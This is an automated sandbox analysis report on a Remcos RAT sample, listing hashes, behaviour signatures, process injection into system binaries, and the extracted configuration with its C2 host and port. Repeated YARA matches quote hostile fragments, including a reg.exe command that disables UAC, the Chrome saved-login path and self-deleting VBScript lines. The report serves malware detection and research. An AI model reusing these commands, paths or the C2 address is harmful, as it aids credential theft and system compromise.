Play interactive tour

Edit tour

Windows Analysis Report ZfigYV6HXd

Overview

General Information

Sample Name:	ZfigYV6HXd (renamed file extension from none to exe)
Analysis ID:	488388
MD5:	1a1a9b3969abcd2fccd2c6ce20be68ac
SHA1:	4aa438483d23766f72ba0f4e2bccb2dd30689845
SHA256:	80b539d191e840c8f421b2a1c34dcdd34961675d43d678d08b55d17f1e97fc63
Tags:	32exetrojan
Infos:
Most interesting Screenshot:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Remcos RAT

Detected Remcos RAT

Multi AV Scanner detection for dropped file

Writes to foreign memory regions

Contains functionality to steal Firefox passwords or cookies

Delayed program exit found

Machine Learning detection for sample

Injects a PE file into a foreign processes

Contains functionality to steal Chrome passwords or cookies

Contains functionality to inject code into remote processes

Contains functionalty to change the wallpaper

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Creates a thread in another existing process (thread injection)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to enumerate running services

Contains functionality to dynamically determine API calls

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Contains functionality to read the PEB

Detected TCP or UDP traffic on non-standard ports

Contains functionality to download and launch executables

Uses reg.exe to modify the Windows registry

Contains functionality to retrieve information about pressed keystrokes

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Contains functionality to simulate mouse events

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

ZfigYV6HXd.exe (PID: 3192 cmdline: 'C:\Users\user\Desktop\ZfigYV6HXd.exe' MD5: 1A1A9B3969ABCD2FCCD2C6CE20BE68AC)

logagent.exe (PID: 6224 cmdline: C:\Windows\System32\logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)

cmd.exe (PID: 6272 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6332 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6408 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

reg.exe (PID: 6508 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)

conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Kkjczlm.exe (PID: 6396 cmdline: 'C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe' MD5: 1A1A9B3969ABCD2FCCD2C6CE20BE68AC)

mobsync.exe (PID: 6232 cmdline: C:\Windows\System32\mobsync.exe MD5: 44C19378FA529DD88674BAF647EBDC3C)

Kkjczlm.exe (PID: 6604 cmdline: 'C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe' MD5: 1A1A9B3969ABCD2FCCD2C6CE20BE68AC)

logagent.exe (PID: 6200 cmdline: C:\Windows\System32\logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)

cleanup

Malware Configuration

Threatname: Remcos

{"Version": "3.2.1 Pro", "Host:Port:Password": "trapboijiggy.dvrlists.com:54614:1", "Assigned name": "Octopus", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Octopus-GM39UT", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\Libraries\mlzcjkK.url	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x14:$file: URL= 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.519137260.0000000003017000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp	REMCOS_RAT_variants	unknown	unknown	0x606a4:$str_a1: C:\Windows\System32\cmd.exe 0x60620:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60620:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5fc28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60280:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f87c:$str_b2: Executing file: 0x607e8:$str_b3: GetDirectListeningPort 0x60040:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60268:$str_b7: \update.vbs 0x5f8cc:$str_b9: Downloaded file: 0x5f8b8:$str_b10: Downloading file: 0x5f8a0:$str_b12: Failed to upload file: 0x607b0:$str_b13: StartForward 0x607d0:$str_b14: StopForward 0x60210:$str_b15: fso.DeleteFile " 0x601a4:$str_b16: On Error Resume Next 0x60240:$str_b17: fso.DeleteFolder " 0x5f890:$str_b18: Uploaded file: 0x5f90c:$str_b19: Unable to delete: 0x601d8:$str_b20: while fso.FileExists(" 0x5fd61:$str_c0: [Firefox StoredLogins not found]
0000000E.00000002.520767321.0000000010590000.00000040.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000E.00000002.520767321.0000000010590000.00000040.00000001.sdmp	REMCOS_RAT_variants	unknown	unknown	0x60e5f:$str_a1: C:\Windows\System32\cmd.exe 0x60ddb:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60ddb:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x603e3:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60a3b:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x60037:$str_b2: Executing file: 0x60fa3:$str_b3: GetDirectListeningPort 0x607fb:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60a23:$str_b7: \update.vbs 0x60087:$str_b9: Downloaded file: 0x60073:$str_b10: Downloading file: 0x6005b:$str_b12: Failed to upload file: 0x60f6b:$str_b13: StartForward 0x60f8b:$str_b14: StopForward 0x609cb:$str_b15: fso.DeleteFile " 0x6095f:$str_b16: On Error Resume Next 0x609fb:$str_b17: fso.DeleteFolder " 0x6004b:$str_b18: Uploaded file: 0x600c7:$str_b19: Unable to delete: 0x60993:$str_b20: while fso.FileExists(" 0x6051c:$str_c0: [Firefox StoredLogins not found]
00000020.00000002.436279698.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000020.00000002.436279698.0000000000400000.00000040.00000001.sdmp	REMCOS_RAT_variants	unknown	unknown	0x606a4:$str_a1: C:\Windows\System32\cmd.exe 0x60620:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60620:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5fc28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60280:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f87c:$str_b2: Executing file: 0x607e8:$str_b3: GetDirectListeningPort 0x60040:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60268:$str_b7: \update.vbs 0x5f8cc:$str_b9: Downloaded file: 0x5f8b8:$str_b10: Downloading file: 0x5f8a0:$str_b12: Failed to upload file: 0x607b0:$str_b13: StartForward 0x607d0:$str_b14: StopForward 0x60210:$str_b15: fso.DeleteFile " 0x601a4:$str_b16: On Error Resume Next 0x60240:$str_b17: fso.DeleteFolder " 0x5f890:$str_b18: Uploaded file: 0x5f90c:$str_b19: Unable to delete: 0x601d8:$str_b20: while fso.FileExists(" 0x5fd61:$str_c0: [Firefox StoredLogins not found]
0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp	REMCOS_RAT_variants	unknown	unknown	0x606a4:$str_a1: C:\Windows\System32\cmd.exe 0x60620:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60620:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5fc28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60280:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f87c:$str_b2: Executing file: 0x607e8:$str_b3: GetDirectListeningPort 0x60040:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60268:$str_b7: \update.vbs 0x5f8cc:$str_b9: Downloaded file: 0x5f8b8:$str_b10: Downloading file: 0x5f8a0:$str_b12: Failed to upload file: 0x607b0:$str_b13: StartForward 0x607d0:$str_b14: StopForward 0x60210:$str_b15: fso.DeleteFile " 0x601a4:$str_b16: On Error Resume Next 0x60240:$str_b17: fso.DeleteFolder " 0x5f890:$str_b18: Uploaded file: 0x5f90c:$str_b19: Unable to delete: 0x601d8:$str_b20: while fso.FileExists(" 0x5fd61:$str_c0: [Firefox StoredLogins not found]
0000001C.00000002.417356547.0000000002D18000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000020.00000002.437204734.0000000003297000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000020.00000002.437522537.0000000010590000.00000040.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000020.00000002.437522537.0000000010590000.00000040.00000001.sdmp	REMCOS_RAT_variants	unknown	unknown	0x60e5f:$str_a1: C:\Windows\System32\cmd.exe 0x60ddb:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60ddb:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x603e3:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60a3b:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x60037:$str_b2: Executing file: 0x60fa3:$str_b3: GetDirectListeningPort 0x607fb:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60a23:$str_b7: \update.vbs 0x60087:$str_b9: Downloaded file: 0x60073:$str_b10: Downloading file: 0x6005b:$str_b12: Failed to upload file: 0x60f6b:$str_b13: StartForward 0x60f8b:$str_b14: StopForward 0x609cb:$str_b15: fso.DeleteFile " 0x6095f:$str_b16: On Error Resume Next 0x609fb:$str_b17: fso.DeleteFolder " 0x6004b:$str_b18: Uploaded file: 0x600c7:$str_b19: Unable to delete: 0x60993:$str_b20: while fso.FileExists(" 0x6051c:$str_c0: [Firefox StoredLogins not found]
0000001C.00000002.417466186.0000000010590000.00000040.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001C.00000002.417466186.0000000010590000.00000040.00000001.sdmp	REMCOS_RAT_variants	unknown	unknown	0x60e5f:$str_a1: C:\Windows\System32\cmd.exe 0x60ddb:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60ddb:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x603e3:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60a3b:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x60037:$str_b2: Executing file: 0x60fa3:$str_b3: GetDirectListeningPort 0x607fb:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60a23:$str_b7: \update.vbs 0x60087:$str_b9: Downloaded file: 0x60073:$str_b10: Downloading file: 0x6005b:$str_b12: Failed to upload file: 0x60f6b:$str_b13: StartForward 0x60f8b:$str_b14: StopForward 0x609cb:$str_b15: fso.DeleteFile " 0x6095f:$str_b16: On Error Resume Next 0x609fb:$str_b17: fso.DeleteFolder " 0x6004b:$str_b18: Uploaded file: 0x600c7:$str_b19: Unable to delete: 0x60993:$str_b20: while fso.FileExists(" 0x6051c:$str_c0: [Firefox StoredLogins not found]
Process Memory Space: logagent.exe PID: 6224	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: mobsync.exe PID: 6232	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: logagent.exe PID: 6200	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
28.2.mobsync.exe.740000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.2.mobsync.exe.740000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x606a4:$str_a1: C:\Windows\System32\cmd.exe 0x60620:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60620:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5fc28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60280:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f87c:$str_b2: Executing file: 0x607e8:$str_b3: GetDirectListeningPort 0x60040:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60268:$str_b7: \update.vbs 0x5f8cc:$str_b9: Downloaded file: 0x5f8b8:$str_b10: Downloading file: 0x5f8a0:$str_b12: Failed to upload file: 0x607b0:$str_b13: StartForward 0x607d0:$str_b14: StopForward 0x60210:$str_b15: fso.DeleteFile " 0x601a4:$str_b16: On Error Resume Next 0x60240:$str_b17: fso.DeleteFolder " 0x5f890:$str_b18: Uploaded file: 0x5f90c:$str_b19: Unable to delete: 0x601d8:$str_b20: while fso.FileExists(" 0x5fd61:$str_c0: [Firefox StoredLogins not found]
32.2.logagent.exe.10590000.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
32.2.logagent.exe.10590000.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x60e5f:$str_a1: C:\Windows\System32\cmd.exe 0x60ddb:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60ddb:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x603e3:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60a3b:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x60037:$str_b2: Executing file: 0x60fa3:$str_b3: GetDirectListeningPort 0x607fb:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60a23:$str_b7: \update.vbs 0x60087:$str_b9: Downloaded file: 0x60073:$str_b10: Downloading file: 0x6005b:$str_b12: Failed to upload file: 0x60f6b:$str_b13: StartForward 0x60f8b:$str_b14: StopForward 0x609cb:$str_b15: fso.DeleteFile " 0x6095f:$str_b16: On Error Resume Next 0x609fb:$str_b17: fso.DeleteFolder " 0x6004b:$str_b18: Uploaded file: 0x600c7:$str_b19: Unable to delete: 0x60993:$str_b20: while fso.FileExists(" 0x6051c:$str_c0: [Firefox StoredLogins not found]
32.2.logagent.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
32.2.logagent.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x606a4:$str_a1: C:\Windows\System32\cmd.exe 0x60620:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60620:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5fc28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60280:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f87c:$str_b2: Executing file: 0x607e8:$str_b3: GetDirectListeningPort 0x60040:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60268:$str_b7: \update.vbs 0x5f8cc:$str_b9: Downloaded file: 0x5f8b8:$str_b10: Downloading file: 0x5f8a0:$str_b12: Failed to upload file: 0x607b0:$str_b13: StartForward 0x607d0:$str_b14: StopForward 0x60210:$str_b15: fso.DeleteFile " 0x601a4:$str_b16: On Error Resume Next 0x60240:$str_b17: fso.DeleteFolder " 0x5f890:$str_b18: Uploaded file: 0x5f90c:$str_b19: Unable to delete: 0x601d8:$str_b20: while fso.FileExists(" 0x5fd61:$str_c0: [Firefox StoredLogins not found]
28.2.mobsync.exe.740000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.2.mobsync.exe.740000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x5f4a4:$str_a1: C:\Windows\System32\cmd.exe 0x5f420:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f420:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ea28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f080:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5e67c:$str_b2: Executing file: 0x5f5e8:$str_b3: GetDirectListeningPort 0x5ee40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f068:$str_b7: \update.vbs 0x5e6cc:$str_b9: Downloaded file: 0x5e6b8:$str_b10: Downloading file: 0x5e6a0:$str_b12: Failed to upload file: 0x5f5b0:$str_b13: StartForward 0x5f5d0:$str_b14: StopForward 0x5f010:$str_b15: fso.DeleteFile " 0x5efa4:$str_b16: On Error Resume Next 0x5f040:$str_b17: fso.DeleteFolder " 0x5e690:$str_b18: Uploaded file: 0x5e70c:$str_b19: Unable to delete: 0x5efd8:$str_b20: while fso.FileExists(" 0x5eb61:$str_c0: [Firefox StoredLogins not found]
28.2.mobsync.exe.10590000.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.2.mobsync.exe.10590000.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x60e5f:$str_a1: C:\Windows\System32\cmd.exe 0x60ddb:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60ddb:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x603e3:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60a3b:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x60037:$str_b2: Executing file: 0x60fa3:$str_b3: GetDirectListeningPort 0x607fb:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60a23:$str_b7: \update.vbs 0x60087:$str_b9: Downloaded file: 0x60073:$str_b10: Downloading file: 0x6005b:$str_b12: Failed to upload file: 0x60f6b:$str_b13: StartForward 0x60f8b:$str_b14: StopForward 0x609cb:$str_b15: fso.DeleteFile " 0x6095f:$str_b16: On Error Resume Next 0x609fb:$str_b17: fso.DeleteFolder " 0x6004b:$str_b18: Uploaded file: 0x600c7:$str_b19: Unable to delete: 0x60993:$str_b20: while fso.FileExists(" 0x6051c:$str_c0: [Firefox StoredLogins not found]
28.2.mobsync.exe.10590000.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.2.mobsync.exe.10590000.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x6025f:$str_a1: C:\Windows\System32\cmd.exe 0x601db:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x601db:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f7e3:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5fe3b:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f437:$str_b2: Executing file: 0x603a3:$str_b3: GetDirectListeningPort 0x5fbfb:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5fe23:$str_b7: \update.vbs 0x5f487:$str_b9: Downloaded file: 0x5f473:$str_b10: Downloading file: 0x5f45b:$str_b12: Failed to upload file: 0x6036b:$str_b13: StartForward 0x6038b:$str_b14: StopForward 0x5fdcb:$str_b15: fso.DeleteFile " 0x5fd5f:$str_b16: On Error Resume Next 0x5fdfb:$str_b17: fso.DeleteFolder " 0x5f44b:$str_b18: Uploaded file: 0x5f4c7:$str_b19: Unable to delete: 0x5fd93:$str_b20: while fso.FileExists(" 0x5f91c:$str_c0: [Firefox StoredLogins not found]
14.2.logagent.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
14.2.logagent.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x5f4a4:$str_a1: C:\Windows\System32\cmd.exe 0x5f420:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f420:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ea28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f080:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5e67c:$str_b2: Executing file: 0x5f5e8:$str_b3: GetDirectListeningPort 0x5ee40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f068:$str_b7: \update.vbs 0x5e6cc:$str_b9: Downloaded file: 0x5e6b8:$str_b10: Downloading file: 0x5e6a0:$str_b12: Failed to upload file: 0x5f5b0:$str_b13: StartForward 0x5f5d0:$str_b14: StopForward 0x5f010:$str_b15: fso.DeleteFile " 0x5efa4:$str_b16: On Error Resume Next 0x5f040:$str_b17: fso.DeleteFolder " 0x5e690:$str_b18: Uploaded file: 0x5e70c:$str_b19: Unable to delete: 0x5efd8:$str_b20: while fso.FileExists(" 0x5eb61:$str_c0: [Firefox StoredLogins not found]
32.2.logagent.exe.10590000.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
32.2.logagent.exe.10590000.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x6025f:$str_a1: C:\Windows\System32\cmd.exe 0x601db:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x601db:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f7e3:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5fe3b:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f437:$str_b2: Executing file: 0x603a3:$str_b3: GetDirectListeningPort 0x5fbfb:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5fe23:$str_b7: \update.vbs 0x5f487:$str_b9: Downloaded file: 0x5f473:$str_b10: Downloading file: 0x5f45b:$str_b12: Failed to upload file: 0x6036b:$str_b13: StartForward 0x6038b:$str_b14: StopForward 0x5fdcb:$str_b15: fso.DeleteFile " 0x5fd5f:$str_b16: On Error Resume Next 0x5fdfb:$str_b17: fso.DeleteFolder " 0x5f44b:$str_b18: Uploaded file: 0x5f4c7:$str_b19: Unable to delete: 0x5fd93:$str_b20: while fso.FileExists(" 0x5f91c:$str_c0: [Firefox StoredLogins not found]
14.2.logagent.exe.105919bb.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
14.2.logagent.exe.105919bb.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x5f4a4:$str_a1: C:\Windows\System32\cmd.exe 0x5f420:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f420:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ea28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f080:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5e67c:$str_b2: Executing file: 0x5f5e8:$str_b3: GetDirectListeningPort 0x5ee40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f068:$str_b7: \update.vbs 0x5e6cc:$str_b9: Downloaded file: 0x5e6b8:$str_b10: Downloading file: 0x5e6a0:$str_b12: Failed to upload file: 0x5f5b0:$str_b13: StartForward 0x5f5d0:$str_b14: StopForward 0x5f010:$str_b15: fso.DeleteFile " 0x5efa4:$str_b16: On Error Resume Next 0x5f040:$str_b17: fso.DeleteFolder " 0x5e690:$str_b18: Uploaded file: 0x5e70c:$str_b19: Unable to delete: 0x5efd8:$str_b20: while fso.FileExists(" 0x5eb61:$str_c0: [Firefox StoredLogins not found]
14.2.logagent.exe.10590000.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
